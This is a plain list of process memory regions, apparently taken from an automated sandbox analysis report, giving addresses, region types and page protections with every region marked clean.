7FFFFF10000
unkown
page execute and read and write
 clean
420000
heap private
page read and write
 clean
3A08000
unkown
page read and write
 clean
1E2B000
heap private
page read and write
 clean
2820000
unkown
page read and write
 clean
3419000
unkown
page read and write
 clean
470000
heap private
page read and write
 clean
2DDF000
unkown
page read and write
 clean
2F67000
unkown
page read and write
 clean
4C50000
heap private
page execute and read and write
 clean
3E5000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
45F0000
unkown
page read and write
 clean
7A0000
unkown
page read and write
 clean
2D0A000
heap private
page execute and read and write
 clean
36AB000
unkown
page read and write
 clean
23DC000
unkown
page read and write
 clean
2B7000
heap default
page read and write
 clean
760000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
3AE0000
unkown
page read and write
 clean
960000
unkown image
page readonly
 clean
1B320000
unkown
page read and write
 clean
1B4F4000
unkown
page read and write
 clean
305D000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
460000
unkown image
page readonly
 clean
4996000
heap private
page read and write
 clean
128000
heap default
page read and write
 clean
4D0000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
1A0000
unkown
page read and write
 clean
7790000
heap private
page read and write
 clean
3A34000
unkown
page read and write
 clean
362E000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
154000
heap default
page read and write
 clean
40000
unkown image
page readonly
 clean
2A2A000
unkown
page read and write
 clean
389E000
unkown
page read and write
 clean
21A000
unkown
page execute and read and write
 clean
58DE000
stack
page read and write
 clean
3EF000
stack
page read and write
 clean
760000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
2820000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
2FEA000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
450000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
20E0000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
2F18000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
3259000
unkown
page read and write
 clean
256000
unkown
page read and write
 clean
7FF00180000
unkown
page execute and read and write
 clean
27A0000
unkown
page read and write
 clean
5C2C000
stack
page read and write
 clean
8F0000
unkown image
page readonly
 clean
7FFFFFC0000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
2CDF000
stack
page read and write
 clean
433F000
stack
page read and write
 clean
5BCE000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
20E0000
unkown
page read and write
 clean
CE0000
unkown image
page readonly
 clean
6519000
unkown
page read and write
 clean
BF0000
heap private
page execute and read and write
 clean
1B88A000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
5BF000
stack
page read and write
 clean
7A1000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
165000
unkown
page execute and read and write
 clean
3578000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
1B49D000
unkown
page read and write
 clean
308E000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
7A0000
unkown
page read and write
 clean
7FF00200000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
27A0000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
36B8000
unkown
page read and write
 clean
630000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
2FAF000
unkown
page read and write
 clean
2FE0000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
1A4000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
74000
heap private
page read and write
 clean
3F0000
unkown
page read and write
 clean
40000
unkown image
page readonly
 clean
40000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
2EE2000
unkown
page read and write
 clean
790000
unkown
page read and write
 clean
14D000
unkown
page execute and read and write
 clean
27A0000
unkown
page read and write
 clean
79A000
heap default
page read and write
 clean
2820000
unkown
page read and write
 clean
323C000
unkown
page read and write
 clean
780000
unkown
page read and write
 clean
9730000
unkown
page read and write
 clean
3029000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
3007000
unkown
page read and write
 clean
7FF000D0000
unkown
page read and write
 clean
3729000
unkown
page read and write
 clean
7FF001C0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
5B1D000
stack
page read and write
 clean
2820000
unkown
page read and write
 clean
66F000
stack
page read and write
 clean
2F1C000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
2DBF000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
4902000
heap private
page read and write
 clean
3190000
unkown
page read and write
 clean
1B0000
unkown
page read and write
 clean
271A000
unkown
page read and write
 clean
2C0000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
480000
unkown
page read and write
 clean
576E000
stack
page read and write
 clean
C50000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
B10000
heap private
page read and write
 clean
500000
heap default
page read and write
 clean
3219000
unkown
page read and write
 clean
714C000
unkown
page read and write
 clean
30A6000
unkown
page read and write
 clean
25B0000
heap private
page read and write
 clean
2B0000
heap default
page read and write
 clean
450000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
2AC0000
unkown
page read and write
 clean
614F000
stack
page read and write
 clean
1F0000
unkown
page read and write
 clean
7A0000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
3B2D000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
D0000
unkown image
page read and write
 clean
50000
unkown image
page readonly
 clean
4B74000
heap private
page read and write
 clean
32C0000
unkown
page read and write
 clean
36BB000
unkown
page read and write
 clean
582A000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
2A25000
unkown
page read and write
 clean
453000
unkown
page read and write
 clean
3A70000
unkown
page read and write
 clean
3692000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
2446000
unkown
page read and write
 clean
2FFA000
unkown
page read and write
 clean
255000
unkown
page read and write | page guard
 clean
7EFD0000
unkown image
page readonly
 clean
3B14000
unkown
page read and write
 clean
3061000
unkown
page read and write
 clean
BC0000
unkown
page read and write
 clean
534E000
stack
page read and write
 clean
E0000
unkown
page read and write
 clean
5C1E000
stack
page read and write
 clean
1D0000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
5960000
unkown
page read and write
 clean
36AB000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
15A000
unkown
page execute and read and write
 clean
2FEA000
unkown
page read and write
 clean
1B960000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
76C000
heap default
page read and write
 clean
450000
unkown
page read and write
 clean
FB000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
2AAD000
stack
page read and write
 clean
509E000
stack
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
780000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
1E70000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
6B0000
unkown
page read and write
 clean
466000
unkown
page read and write
 clean
3218000
unkown
page read and write
 clean
3327000
unkown
page read and write
 clean
5450000
unkown image
page read and write
 clean
7FF001D0000
unkown
page read and write
 clean
7FF00210000
unkown
page read and write
 clean
3679000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
2880000
heap private
page execute and read and write
 clean
3048000
unkown
page read and write
 clean
47E0000
unkown
page read and write
 clean
12EA0000
unkown
page read and write
 clean
7FF00210000
unkown
page execute and read and write
 clean
7EFB2000
unkown image
page readonly
 clean
2B30000
unkown
page read and write
 clean
23D3000
unkown
page read and write
 clean
7FF000F0000
unkown
page read and write
 clean
3562000
unkown
page read and write
 clean
1B4BA000
unkown
page read and write
 clean
23E8000
unkown
page read and write
 clean
7FF00280000
unkown
page execute and read and write
 clean
7FF00180000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
24F1000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
7F0000
unkown image
page readonly
 clean
3A01000
unkown
page read and write
 clean
1B884000
unkown
page read and write
 clean
663E000
stack
page read and write
 clean
CCE000
unkown image
page readonly
 clean
338F000
unkown
page read and write
 clean
3097000
unkown
page read and write
 clean
39AC000
unkown
page read and write
 clean
39FD000
unkown
page read and write
 clean
4970000
heap private
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
25D2000
heap private
page read and write
 clean
50000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
581F000
unkown
page read and write
 clean
216000
unkown
page execute and read and write
 clean
581F000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
8E0000
unkown image
page readonly
 clean
223E000
unkown
page read and write
 clean
4200000
stack
page read and write
 clean
7FF00260000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
B37000
unkown
page read and write
 clean
39DA000
unkown
page read and write
 clean
12E91000
unkown
page read and write
 clean
2FED000
unkown
page read and write
 clean
B20000
unkown
page read and write
 clean
5E0000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
3E7000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
6B0000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
21E000
heap default
page read and write
 clean
24D7000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
22F0000
unkown
page read and write
 clean
5134000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
270000
heap default
page read and write
 clean
496F000
stack
page read and write
 clean
544E000
stack
page read and write
 clean
668D000
stack
page read and write
 clean
28A4000
unkown
page read and write
 clean
4CDE000
stack
page read and write
 clean
368F000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
30FE000
unkown
page read and write
 clean
4230000
unkown
page read and write
 clean
48E5000
heap private
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
7EFE0000
unkown image
page readonly
 clean
10000
unkown image
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
1EDE000
stack
page read and write
 clean
20000
unkown image
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
455000
unkown
page read and write
 clean
5824000
unkown
page read and write
 clean
3AFF000
unkown
page read and write
 clean
700000
heap default
page read and write
 clean
2C7F000
unkown
page read and write
 clean
580000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
2FED000
unkown
page read and write
 clean
2310000
heap private
page read and write
 clean
1BE6000
unkown
page read and write
 clean
6CEE000
stack
page read and write | page guard
 clean
1FF5000
heap private
page read and write
 clean
496E000
stack
page read and write | page guard
 clean
7FFFFFC2000
unkown image
page readonly
 clean
556000
heap default
page read and write
 clean
760000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
2FD1000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
579E000
stack
page read and write
 clean
36A5000
unkown
page read and write
 clean
3AF5000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
3F0000
unkown
page read and write
 clean
2E9E000
unkown
page read and write
 clean
4ABE000
stack
page read and write
 clean
5ABC000
stack
page read and write
 clean
450000
unkown
page read and write
 clean
1C93E000
stack
page read and write
 clean
212000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
700000
unkown image
page readonly
 clean
2F5E000
unkown
page read and write
 clean
1FF0000
heap private
page read and write
 clean
3E0000
unkown
page read and write
 clean
1CA0000
unkown
page read and write
 clean
3682000
unkown
page read and write
 clean
76A000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
7FF00030000
unkown
page read and write
 clean
3898000
unkown
page read and write
 clean
310E000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
45CE000
stack
page read and write
 clean
772E000
unkown
page read and write
 clean
2030000
unkown image
page readonly
 clean
2F98000
unkown
page read and write
 clean
C30000
unkown
page read and write
 clean
2AF6000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
7FF000D2000
unkown
page execute and read and write
 clean
3212000
unkown
page read and write
 clean
4682000
heap private
page read and write
 clean
7480000
heap private
page read and write
 clean
4210000
stack
page read and write
 clean
760000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
27A0000
unkown
page read and write
 clean
306E000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
31F1000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
BB0000
unkown
page execute and read and write
 clean
3695000
unkown
page read and write
 clean
3AAF000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
36AE000
unkown
page read and write
 clean
1FA0000
unkown
page read and write
 clean
36A8000
unkown
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
57A1000
unkown
page read and write
 clean
2070000
unkown
page read and write
 clean
1DF5000
heap private
page read and write
 clean
CCE000
unkown image
page readonly
 clean
20000
unkown image
page read and write
 clean
50000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
357B000
unkown
page read and write
 clean
120000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
7FF00200000
unkown
page execute and read and write
 clean
1C780000
unkown
page read and write
 clean
1BA60000
unkown
page read and write
 clean
324000
heap private
page read and write
 clean
7FF00032000
unkown
page execute and read and write
 clean
27A0000
unkown
page read and write
 clean
70000
unkown image
page read and write
 clean
760000
unkown
page read and write
 clean
1A0000
unkown
page execute and read and write
 clean
7EFB0000
unkown image
page readonly
 clean
12D81000
unkown
page read and write
 clean
30A2000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
7FF00190000
unkown
page execute and read and write
 clean
7EFB2000
unkown image
page readonly
 clean
2210000
heap private
page read and write
 clean
7C0000
unkown image
page readonly
 clean
3077000
unkown image
page readonly
 clean
3565000
unkown
page read and write
 clean
312A000
unkown
page read and write
 clean
2E98000
unkown
page read and write
 clean
1C0000
heap private
page read and write
 clean
30BB000
unkown
page read and write
 clean
55BE000
stack
page read and write
 clean
12F02000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
7FFFFFD0000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
7C82000
unkown
page read and write
 clean
There are 1561 hidden memdumps, click here to show them.